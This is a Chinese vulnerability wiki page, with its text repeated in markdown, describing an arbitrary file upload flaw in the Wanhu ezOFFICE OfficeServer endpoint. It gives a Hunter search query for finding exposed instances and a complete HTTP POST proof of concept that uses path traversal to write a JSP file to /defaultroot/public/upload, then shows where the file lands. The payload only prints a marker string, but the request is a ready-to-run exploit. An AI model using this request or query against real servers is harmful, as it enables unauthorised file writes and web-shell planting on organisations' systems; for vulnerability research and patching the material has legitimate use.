fofamini-wiki

登录白背景

源码

万户协同办公平台 OfficeServer存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台 OfficeServer存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/OfficeServer HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 621

--00content0boundary00
Content-Disposition: form-data; name="value1"

{"OPTION":"SAVEPDF"}
--00content0boundary00
Content-Disposition: form-data; name="value2"

{"PDFPZ":"1"}
--00content0boundary00
Content-Disposition: form-data; name="value3"

{"FILENAMETRUE":"../../../public/upload/stc.jsp."}
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.jsp"
Content-Type: text/plain


--00content0boundary00
Content-Disposition: form-data; name="file"; filename="hello.jsp"
Content-Type: image/jpeg

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00--

上传文件位置

/defaultroot/public/upload/stc.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/gfrggnmgeo6xoghd

# 万户协同办公平台 OfficeServer存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台 OfficeServer存在任意文件上传漏洞

# 二、影响版本

- 万户ezoffice

# 三、资产测绘

- hunter`app.name="万户 Ezoffice OA"`
- 登录页面

![image.png](./img/0uVPJEhW-2xPKmyt/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-450041.png)

# 四、漏洞复现
```
POST /defaultroot/OfficeServer HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: 
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 621

--00content0boundary00
Content-Disposition: form-data; name="value1"

{"OPTION":"SAVEPDF"}
--00content0boundary00
Content-Disposition: form-data; name="value2"

{"PDFPZ":"1"}
--00content0boundary00
Content-Disposition: form-data; name="value3"

{"FILENAMETRUE":"../../../public/upload/stc.jsp."}
--00content0boundary00
Content-Disposition: form-data; name="file"; filename="stc.jsp"
Content-Type: text/plain

--00content0boundary00
Content-Disposition: form-data; name="file"; filename="hello.jsp"
Content-Type: image/jpeg

<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>
--00content0boundary00--

```
![image.png](./img/0uVPJEhW-2xPKmyt/1708948997104-845d56a1-66b9-48ed-9833-e9f5bb169613-983834.png)
上传文件位置
```
/defaultroot/public/upload/stc.jsp
```
![image.png](./img/0uVPJEhW-2xPKmyt/1708949029209-65b69c89-21b1-4996-862f-69473691700c-374132.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gfrggnmgeo6xoghd>